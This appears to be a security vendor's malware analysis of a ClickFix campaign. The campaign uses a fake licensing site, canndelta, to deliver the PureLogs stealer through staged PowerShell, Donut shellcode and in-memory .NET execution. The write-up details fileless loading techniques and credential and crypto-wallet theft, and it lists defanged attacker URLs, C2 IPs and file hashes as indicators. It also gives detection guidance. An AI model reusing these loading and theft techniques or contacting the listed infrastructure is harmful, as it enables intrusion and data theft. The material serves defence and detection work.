The Reveal Platform
This research analyzes a ClickFix-based malware campaign distributing the .NET-based PureLogs stealer through the spoofed licensing-themed website canndelta[.]com. Victims are socially engineered into executing malicious PowerShell commands, initiating a multi-stage infection chain involving staged PowerShell loaders, Donut shellcode, and in-memory .NET assembly execution.
The attack chain relies heavily on fileless execution techniques, including RWX memory allocation, dynamic API resolution through PEB traversal, and unmanaged-to-managed CLR execution using Donut loader functionality. These techniques significantly reduce on-disk artifacts and complicate traditional file-based detection.
Once executed, PureLogs performs extensive host reconnaissance and credential theft operations targeting Chromium browser data, Windows Credential Manager secrets, cryptocurrency wallets, password managers, SSH-related files, and browser session tokens. Analysis also identified references to MetaMask Snap plugins associated with multiple blockchain ecosystems, indicating cryptocurrency-focused theft objectives.
During dynamic analysis, the malware established outbound TCP-based command-and-control communication with attacker-controlled infrastructure to exfiltrate harvested data and receive runtime configuration information.
Fig: PureLogs Stealer Distributed Through Impersonation of Licensing Firm “Canndelta”.
Victims visiting canndelta[.]com are presented with a fake verification prompt leveraging the ClickFix social engineering technique. The page instructs users to execute a malicious PowerShell command using the Win+R dialog followed by Ctrl+V and Enter, bypassing traditional browser-based download prompts and reducing user suspicion.
The executed PowerShell command retrieves and executes a remote PowerShell payload directly in memory from attacker-controlled infrastructure hosted at 178.16.52.232.
The infection chain consists of multiple staged payloads designed to progressively deploy the final PureLogs stealer while minimizing on-disk artifacts.
Fig: Canndelta-ClickFix-Campaign-Execution-Flow
The first-stage PowerShell payload acts as a lightweight in-memory downloader responsible for retrieving and executing additional malicious content from remote infrastructure.
The script launches a hidden PowerShell instance with suppressed console output and executes attacker-supplied content directly via Invoke-Expression (IEX). The loader relies on staged remote execution rather than embedded payloads, allowing operators to dynamically modify downstream payload delivery.
Observed behaviors include:
Fig: Malicious PowerShell Downloader and Remote Code Execution
The second-stage PowerShell loader retrieves shellcode from remote infrastructure and executes it directly from memory without writing the payload to disk.
The script allocates executable memory using VirtualAlloc with PAGE_EXECUTE_READWRITE permissions, copies the downloaded shellcode into the allocated memory region, and initiates execution through CreateThread.
This execution model enables staged in-memory payload delivery while minimizing filesystem artifacts commonly monitored by endpoint security products.
Fig: In-Memory PowerShell Payload Loader Using RWX Memory Execution
Analysis of the shellcode revealed a 64-bit Donut-based loader responsible for transitioning execution from unmanaged shellcode into managed .NET execution.
The shellcode accesses the Process Environment Block (PEB) through gs:[0x60] to locate PEB_LDR_DATA and enumerate loaded modules dynamically. Export resolution is performed at runtime without relying on traditional import tables, reducing static analysis visibility.
The loader subsequently initializes the .NET runtime environment required to execute the PureLogs payload directly from memory.
Fig: Shellcode Resolving Loaded Modules via PEB LDR Traversal
During execution, the staged loader chain retrieved an additional PE payload from attacker-controlled infrastructure hosted at 158.94.208.104, which was subsequently used during the in-memory PureLogs execution sequence.
The retrieved content contained a valid PE structure and was subsequently used during the in-memory execution chain associated with the PureLogs deployment process.
Fig: Donut-Shellcode-Downloading-and-Executing-the-Next-Stage-PE-Payload-in-Memory
The loader initializes the .NET CLR runtime using CLRCreateInstance and related COM interfaces before reconstructing the PureLogs assembly in memory through SAFEARRAY-based allocation routines.
The payload is executed using AppDomain.Load(), enabling fully memory-resident .NET execution without requiring the assembly to be written to disk.
This execution model complicates traditional file-based detection and allows the stealer to operate with minimal filesystem visibility.
Fig: In-Memory CLR Initialization Used for Fileless .NET Payload Execution
PureLogs performs host fingerprinting prior to credential collection and exfiltration. The malware enumerates usernames, environment variables, hardware identifiers, session context, and additional system metadata before packaging the information for transmission to the C2 server.
Fig: Malware’s-System-Fingerprinting-Data-in-Memory
Fig: Exfiltration of Host Fingerprint Data
The malware targets browser-integrated cryptocurrency wallet data and related storage artifacts associated with multiple blockchain ecosystems.
Analysis identified references to MetaMask Snap modules including:
These artifacts indicate explicit targeting of cryptocurrency wallet extensions and blockchain-related browser storage.
Fig: MetaMask Snap/Plugin References Indicating Multi-Blockchain Wallet Targeting
PureLogs enumerates sensitive directories associated with cryptocurrency wallets, password managers, browser data, and SSH-related files.
Observed targets include:
The malware also creates temporary headless Chromium profiles to access browser credential stores and authenticated session data.
Fig: PureLogs Stealer Enumerating Wallets, Credentials, and Sensitive Application Data
Fig: Credential Harvesting Through Chromium Data Store Theft
The stealer accesses Windows Credential Manager storage paths to enumerate DPAPI-protected credential artifacts associated with saved authentication data.
Additional targeting of Microsoft Edge browser profiles enables theft of:
Fig: Targeting Windows Credential Manager and Edge Data
During dynamic analysis, the malware established outbound TCP communication with 91.92.243.161:3038 using TcpClient.Connect().
Configuration data associated with the C2 infrastructure was observed in obfuscated form and decrypted at runtime prior to communication establishment.
Fig: Runtime Decryption and Establishment of TCP-Based C2 Communication
Fig: Successful TCP Handshake Between Infected Host and C2 Server
Defenders should monitor for PowerShell processes executing hidden windows combined with outbound connections to IP-based infrastructure. Particular attention should be given to command lines containing Invoke-Expression (IEX), Invoke-RestMethod (IRM), or execution chains involving Win+R initiated process trees.
Memory-based telemetry may reveal VirtualAlloc calls requesting PAGE_EXECUTE_READWRITE permissions followed by CreateThread execution originating from PowerShell processes.
Additional indicators include:
Organizations using the Gurucul SIEM platform can leverage behavioral analytics and cross-source telemetry correlation to identify this attack chain across PowerShell execution, abnormal memory allocation behavior, unmanaged CLR initialization, browser credential access, and suspicious outbound network communication. Correlating Win+R initiated PowerShell activity with RWX memory execution and subsequent TCP connections to external infrastructure can significantly improve detection fidelity for ClickFix-driven malware delivery campaigns.
Additionally, Gurucul SIEM detections can be enriched through:
| ATT&CK Tactic | Technique ID | Technique Name | Observed Activity |
| Initial Access | T1189 | Drive-by Compromise | Victims visit the fake canndelta[.]com website hosting the ClickFix lure. |
| User Execution | T1204.001 | User Execution: Malicious Link | Users are socially engineered into executing a malicious PowerShell command via Win+R and Ctrl+V. |
| Command and Scripting Interpreter | T1059.001 | PowerShell | Multiple PowerShell stages are used for payload download and execution. |
| Ingress Tool Transfer | T1105 | Ingress Tool Transfer | Stage payloads and Donut shellcode are downloaded from remote attacker-controlled servers. |
| Obfuscated Files or Information | T1027 | Obfuscated/Compressed Files and Information | Obfuscated variables and data are used to evade analysis. |
| Reflective Code Loading | T1620 | Reflective Code Loading | Donut-based in-memory assembly execution |
| System Information Discovery | T1082 | System Information Discovery | The malware collects environment details, usernames, hardware identifiers, and session information. |
| File and Directory Discovery | T1083 | File and Directory Discovery | PureLogs enumerates wallet directories, browser data, SSH keys, and credential locations. |
| Credentials from Password Stores | T1555 | Credentials from Password Stores | Targets Chromium browser credentials, password managers, and Windows Credential Manager. |
| Credentials from Web Browsers | T1555.003 | Credentials from Web Browsers | Harvests saved passwords, cookies, autofill data, and browser session tokens. |
| Exfiltration Over C2 Channel | T1041 | Exfiltration Over C2 Channel | Stolen information is transmitted over the established TCP C2 channel. |
| Application Layer Protocol | T1071 | Application Layer Protocol | HTTP and TCP protocols are used for staging payload delivery and C2 communication. |
| IOC | Name |
| 0099deccd390e229895d0c508882632569f9533e42d33a675885ee7f4f5164f3 | Stage1.ps1 |
| 61b453cfedc6c67d9744b963bc3cabbee33f53606fdbf80da04bc3d4c93eb4fb | Stage2.ps1 |
| 9bb96fa6aee45120d14660506320932691310adef4353e684775f590a17c22fc | Donut Shellcode(Stage 3) |
| ac86d43aa69faf616e7d82732c2138edf7f6e239c05cfca3b85b820aa3f3ec5a | my_s.bin(Stage 4) |
| 670dfec73872afec18093e8425fb07cc8aab9f4a838995333419d0298c73a5a2 | PureLogs.exe(Stage 5) |
| Indicator | Value |
| hxxps://canndelta[.]com | URL |
| 178[.]16[.]52[.]232 | IP Address |
| hxxp://158[.]94[.]208[.]92 | URL |
| hxxp://158[.]94[.]208[.]104/x7GkP2mQ9zL4/my_new_l.bin | URL |
| hxxp://158[.]94[.]208[.]104/x7GkP2mQ9zL4/my_s.bin | URL |
Contributors:
Abhishek Samdole
Pandurang Terkar
Rudra Pratap
